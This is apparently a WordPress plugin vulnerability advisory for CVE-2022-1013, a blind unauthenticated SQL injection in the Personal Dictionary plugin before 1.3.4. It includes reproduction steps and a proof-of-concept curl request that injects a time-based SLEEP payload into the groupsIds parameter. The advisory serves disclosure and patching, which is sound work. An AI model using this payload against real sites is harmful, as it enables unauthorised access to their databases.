WordPress Plugin Vulnerabilities

Personal Dictionary < 1.3.4 - Unauthenticated SQLi

Description

The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to a blind SQL injection vulnerability.

Proof of Concept

1. Create a new page with the plugin's shortcode (shortcode can be copied from /wp-admin/admin.php?page=personal-dictionary)
2. Visit the page (as admin) with the shortcode and create a new group (any name is fine)
3. Click on the created group and add a new word to it (the word and it's translation don't matter) - then hit save and close
4. Invoke the following curl command to induce a 5 second sleep:

curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php' --data 'action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1) AND (SELECT 3892 FROM (SELECT(SLEEP(5)))pFvo)-- P'

Affects Plugins

Plugin icon
personal-dictionary
Fixed in 1.3.4

References

CVE
CVE-2022-1013

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
eed70659-9e3e-42a2-b427-56c52e0fbc0d

Timeline

Publicly Published
2022-04-18 (about 2 years ago)
Added
2022-04-18 (about 2 years ago)
Last Updated
2022-04-19 (about 2 years ago)

Other

Published
Title
Published
2015-05-06
Title
Freshmail for WordPress < 1.6 - Unauthenticated SQL Injection
Published
2015-02-19
Title
Huge IT Slider < 2.7.0 - SQL Injection
Published
2024-04-12
Title
User Activity Log Pro <= 2.3.4 - Authenticated (Subscriber+) SQL Injection
Published
2016-10-06
Title
Zotpress < 6.1.3 - SQL Injection
Published
2014-08-01
Title
BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections